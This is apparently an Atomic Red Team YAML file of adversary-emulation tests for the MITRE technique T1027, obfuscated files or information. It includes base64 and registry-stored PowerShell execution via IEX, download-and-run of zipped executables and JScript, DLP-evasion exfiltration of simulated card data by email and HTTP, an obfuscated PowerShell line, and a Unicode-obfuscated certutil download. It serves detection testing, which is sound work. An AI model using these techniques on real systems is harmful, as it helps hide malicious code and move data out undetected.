attack_technique: T1027 display_name: Obfuscated Files or Information atomic_tests: - name: Decode base64 Data into Script auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb description: | Creates a base64-encoded data file and decodes it into an executable shell script Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team` and uname -v supported_platforms: - macos - linux input_arguments: shell_command: description: command to encode type: string default: "echo Hello from the Atomic Red Team && uname -v" dependency_executor_name: sh dependencies: - description: | encode the command into base64 file prereq_command: | if [ -e "/tmp/encoded.dat" ]; then exit 0; else exit 1; fi get_prereq_command: | if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64encode -r -"; else cmd="base64"; fi; echo "#{shell_command}" | $cmd > /tmp/encoded.dat executor: command: | if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi; cat /tmp/encoded.dat | $cmd > /tmp/art.sh chmod +x /tmp/art.sh /tmp/art.sh cleanup_command: | rm /tmp/encoded.dat rm /tmp/art.sh name: sh - name: Execute base64-encoded PowerShell auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6 description: | Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!" supported_platforms: - windows input_arguments: powershell_command: description: PowerShell command to encode type: string default: Write-Host "Hey, Atomic!" executor: command: | $OriginalCommand = '#{powershell_command}' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) $EncodedCommand =[Convert]::ToBase64String($Bytes) $EncodedCommand powershell.exe -EncodedCommand $EncodedCommand name: powershell - name: Execute base64-encoded PowerShell from Windows Registry auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec description: | Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry. supported_platforms: - windows input_arguments: registry_key_storage: description: Windows Registry Key to store code type: string default: HKCU:Software\Microsoft\Windows\CurrentVersion powershell_command: description: PowerShell command to encode type: string default: Write-Host "Hey, Atomic!" registry_entry_storage: description: Windows Registry entry to store code under key type: string default: Debug executor: command: | $OriginalCommand = '#{powershell_command}' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) $EncodedCommand =[Convert]::ToBase64String($Bytes) $EncodedCommand Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))" cleanup_command: | Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: | Mimic execution of compressed executable. When successfully executed, calculator.exe will open. supported_platforms: - windows input_arguments: url_path: description: url to download Exe type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip dependency_executor_name: powershell dependencies: - description: | T1027.exe must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe") {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\" -Force executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027.zip\T1027.exe" cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul taskkill /f /im CalculatorApp.exe >nul 2>nul name: command_prompt - name: DLP Evasion via Sensitive Data in VBA Macro over email auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad description: | Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. supported_platforms: - windows input_arguments: input_file: description: Path of the XLSM file type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm sender: description: sender email type: string default: test@corp.com receiver: description: receiver email type: string default: test@corp.com smtp_server: description: SMTP Server IP Address type: string default: 127.0.0.1 executor: command: | Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments "#{input_file}" -SmtpServer #{smtp_server} name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 description: | Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. supported_platforms: - windows input_arguments: input_file: description: Path of the XLSM file type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm ip_address: description: Destination IP address type: string default: 127.0.0.1 executor: command: | Invoke-WebRequest -Uri #{ip_address} -Method POST -Body "#{input_file}" name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f description: | This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. supported_platforms: - windows executor: command: | $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) name: powershell - name: Obfuscated Command Line using special Unicode characters auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f description: | This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters). Reference: https://wietze.github.io/blog/windows-command-line-obfuscation supported_platforms: - windows input_arguments: remote_file: description: URL of file to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path/filename to save the downloaded file to type: path default: Atomic-license.txt executor: steps: | 1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename. certutil —ૹu૰rlࢰca࣢c෯he –‮spli؅t‮‭ −"൏ᶠ൸" #{remote_file} #{local_path} 2. Press enter to execute the command. You will find the file or webpage you specified saved to the file you specified in the command. name: manual - name: Snake Malware Encrypted crmlog file auto_generated_guid: 7e47ee60-9dd1-4269-9c4f-97953b183268 description: | The following Atomic Test will create a file with a specific name and sets its attributes to Hidden, System, and Archive. This was related to the Snake Malware campaign and is later decrypted by Snake's kernel driver. [Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF) supported_platforms: - windows executor: command: | $file = New-Item $env:windir\registration\04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog; $file.Attributes = 'Hidden', 'System', 'Archive'; Write-Host "File created: $($file.FullName)" cleanup_command: | $fileNameToDelete = '04e53197-72be-4dd8-88b1-533fe6eed577.04e53197-72be-4dd8-88b1-533fe6eed577.crmlog'; $filePathToDelete = "$env:windir\registration\"; $fullPathToDelete = Join-Path $filePathToDelete $fileNameToDelete; if (Test-Path $fullPathToDelete) { Remove-Item -Path $fullPathToDelete -Force; Write-Host "File deleted: $fullPathToDelete" } else { Write-Host "File not found: $fullPathToDelete" } name: powershell elevation_required: true - name: Execution from Compressed JScript File auto_generated_guid: fad04df1-5229-4185-b016-fb6010cd87ac description: | Mimic execution of compressed JavaScript file. When successfully executed, calculator.exe will open. This test is meant to help emulate Gootloader as per https://redcanary.com/blog/gootloader/ supported_platforms: - windows input_arguments: url_path: description: url to download JScript file type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/t1027js.zip dependency_executor_name: powershell dependencies: - description: | T1027.js must exist on disk at PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js") {exit 0} else {exit 1} get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\T1027js.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\" -Force executor: command: | "PathToAtomicsFolder\..\ExternalPayloads\temp_T1027js.zip\T1027js.js" cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul name: command_prompt